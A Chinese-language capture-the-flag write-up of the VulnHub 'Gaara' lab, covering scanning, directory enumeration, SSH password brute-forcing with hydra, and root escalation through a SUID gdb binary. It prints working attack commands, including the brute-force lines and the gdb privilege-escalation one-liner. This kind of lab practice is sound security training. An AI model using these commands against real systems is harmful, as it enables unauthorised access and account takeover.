文章目录
- 1. 主机发现
- 2. 端口扫描
- 3. 服务枚举
- 4. 服务探查
- 5. 突破边界
- 6. 提权
- 6.1 枚举系统信息
- 6.2 查看passwd文件
- 6.3 查看定时任务
- 6.4 查看可执行文件
- 6.5 查看家目录
- 6.6 Linpeas提权
- 7. 获取flag
- 写在最后
靶机地址:https://download.vulnhub.com/gaara/Gaara.ova
1. 主机发现
目前只知道目标靶机在192.168.232.xx网段,通过如下的命令,看看这个网段上在线的主机。
$ nmap -sP 192.168.232.0/24
锁定目标靶机IP为192.168.232.146。
2. 端口扫描
通过下面的命令对目标靶机进行端口扫描。
$ sudo nmap -p 1-65535 192.168.232.146
开放的端口不多,只有一个22端口和80端口,接下来枚举一下对应的服务。
3. 服务枚举
通过下面的命令枚举一下目标端口上的服务。
$ sudo nmap -p22,80 -A -sT -sV 192.168.232.146
信息不是太多,还是直接探查一下。
4. 服务探查
先用浏览器访问一下看看。
感觉是有个图片,不过显示不出来,还是枚举一下目录吧。
$ dirsearch -u http://192.168.232.146:80/
有些诧异,竟然没有一个是可以直接访问的内容。用dirb挂载big字典试试看。
$ dirb http://192.168.232.146 /usr/share/wordlists/dirb/big.txt
效果是一样的,感觉有些无从下手。猛然想起可能是我之前打靶时修改了/etc/hosts文件导致的,修改回来再试一下,结果还是同样的现象,有点难以置信啊,再试试gobuster。
$ gobuster dir -u http://192.168.232.146:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
额,gobuster确实更胜一筹,扫描出了一个/Cryoserver的目录,并且还是200,手工进去看看。
打开也是空空如也,看看页面源代码。
跟上个靶机一样的尿性,最底下有三个目录,分别进去看看。
全都报404啊,去掉前面一层/Cryoserver目录试试看,结果全都是如下图所示的密密麻麻的文字。
大概看了一下,没有发现什么异常内容,不过感觉三个页面的内容都差不太多,先通过比对工具(这里直接用meld工具进行三路比对)看一下有什么区别。发现/Temari和/Kazekage的内容是一致的,不过跟/iamGaara的内容不一致,有一个类似于密码的一串内容,甚是可疑,如下图。
但是哪个用户的密码呢?文本中出现了好几个名字,直接用cewl针对/iamGaara页面生成一个用户名列表,并采用小写字母。
$ cewl --lowercase -m 3 -x 10 http://192.168.232.146/iamGaara > myUser.txt
$ hydra -L myUser.txt -p f1MgN9mTf9SNbzRygcU 192.168.232.146 ssh
爆破失败,先手工试试gaara是不是我们需要的账号吧。
也看不出来,直接用gaara用户挂上rockyou爆破一下看看。
$ hydra -l gaara -P ../../rockyou.txt 192.168.232.146 ssh
分分钟爆破成功,gaara用户的密码是iloveyou2,手工登录进去看看。
5. 突破边界
通过下面的命令登录一下gaara用户。
$ ssh gaara@192.168.232.146 -t "bash --noprofile"
6. 提权
先优化一下shell。
gaara@Gaara:~$ whereis python
gaara@Gaara:~$ /usr/bin/python3.7 -c "import pty;pty.spawn('/bin/bash')"
6.1 枚举系统信息
通过下面的命令枚举一下。
gaara@Gaara:~$ uname -a
gaara@Gaara:~$ cat /etc/*-release
是64位的debian10。
6.2 查看passwd文件
先看看passwd中有哪些用户。
gaara@Gaara:~$ cat /etc/passwd | grep -v "nologin"
除了gaara和root也没有其它的用户,看看是否有写入权限。
没有权限。
6.3 查看定时任务
先看看是否有定时任务。
gaara@Gaara:~$ cat /etc/crontab
没有可疑任务发现。
6.4 查看可执行文件
先看看是否有可执行文件。
gaara@Gaara:~$ sudo -l
gaara@Gaara:~$ find / -user root -perm -4000 2>/dev/null
暂时看不出异样,等会儿用linpeas看一下。
6.5 查看家目录
看看家目录下都有些啥。
gaara@Gaara:~$ ls -lah ~/
这里面有个Kazekage.txt的文件比较可疑,里面的内容很像是一个密码,或者编码后的内容。
其它没有太特殊的内容,先把这一串内容看看是否可以base64之类的解码一下。
gaara@Gaara:~$ echo "L3Vzci9sb2NhbC9nYW1lcw==" | base64 -d
额,莫非解码的内容就是“/usr/local/games”?把这个再base64编码一下看看吧。
还真是,既然这样,就到这个目录下去看看吧。
额,又是一个比较可疑的文件,看看里面都是啥。
完全看不懂,这条线估计要断了。
6.6 Linpeas提权
直接用linpeas看看吧。
gaara@Gaara:~$ chmod u+x linpeas.sh
gaara@Gaara:~$ sh linpeas.sh
看到/usr/bin/gdb具有SUID权限。
直接用gdb尝试一下提权。
gaara@Gaara:/tmp$ /usr/bin/gdb -nx -exec '!bash'
感觉貌似提权成功了,验证一下看看。
看来我高兴的太早了,并没有提权成功,添加一下sudo试试。
gaara@Gaara:/tmp$ sudo /usr/bin/gdb -nx -exec '!bash'
直接没有权限。不过从网上找到用gdb执行python指令是可以提权的,试一下。
gaara@Gaara:/tmp$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
这次出现了心心念念的#,应该是提权成功了,验证一下。
确实成功了。
7. 获取flag
获取一下flag。
写在最后
其实前面我们发现的一段乱七八糟的内容,后来查了一下,是有出处的,叫做brainfuck。Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。这就是一个语言,但它不像C++那么多元化,但难度也一定的增加,因为它只有8种关键字!它有很多种特性,这里就不一一说明了,我们直接把前面的那一坨东西解码看看是啥。
就是依据简单的调侃的文字,没有什么特别的。
